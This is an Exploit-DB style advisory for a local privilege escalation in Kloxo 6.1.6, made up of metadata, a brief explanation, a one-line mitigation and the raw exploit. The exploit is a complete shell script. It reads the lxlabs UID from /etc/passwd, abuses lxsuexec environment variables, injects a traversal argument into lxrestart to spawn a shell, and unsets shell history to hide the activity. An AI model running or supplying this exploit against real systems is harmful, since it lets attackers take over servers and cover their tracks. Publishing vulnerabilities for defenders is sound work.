Vendor: Kloxo
By: HTP
CVSS: 7.2 (HIGH)
Privilege Escalation
CWE: 264
Product Name: Kloxo
Affected Version From: 6.1.6
Affected Version To: 6.1.6
Patch Exists: NO
Related CWE: None
CPE: a:lxcenter:kloxo:6.1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 5
August 2012

Kloxo Local Privilege Escalation

This exploit requires the user to be the Apache user, or another user capable of running lxsuexec. The exploit sets the MUID and GID environment variables to the user ID of the lxlabs user (read from /etc/passwd) and sets TARGET to /bin/sh. It then creates two files in the /tmp directory, w00trc and lol. Finally, it runs lxsuexec on the lol file.

Mitigation:

Ensure that the Apache user is not able to run lxsuexec.
Source

Exploit-DB raw data:

#!/bin/sh
# Exploit Title: Kloxo Local Privilege Escalation
# Google Dork: inurl:kiddies
# Date: August 2012 or so
# Exploit Author: HTP
# Vendor Homepage: http://lxcenter.org/
# Software Link: [download link if available]
# Version: 6.1.6 (Latest)
# Tested on: CentOS 5
# CVE : None
# This exploit requires you to be the Apache user, or another capable of running lxsuexec.
LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`
export MUID=$LXLABS
export GID=$LXLABS
export TARGET=/bin/sh
export CHECK_GID=0
export NON_RESIDENT=1
echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc
echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol
lxsuexec /tmp/lol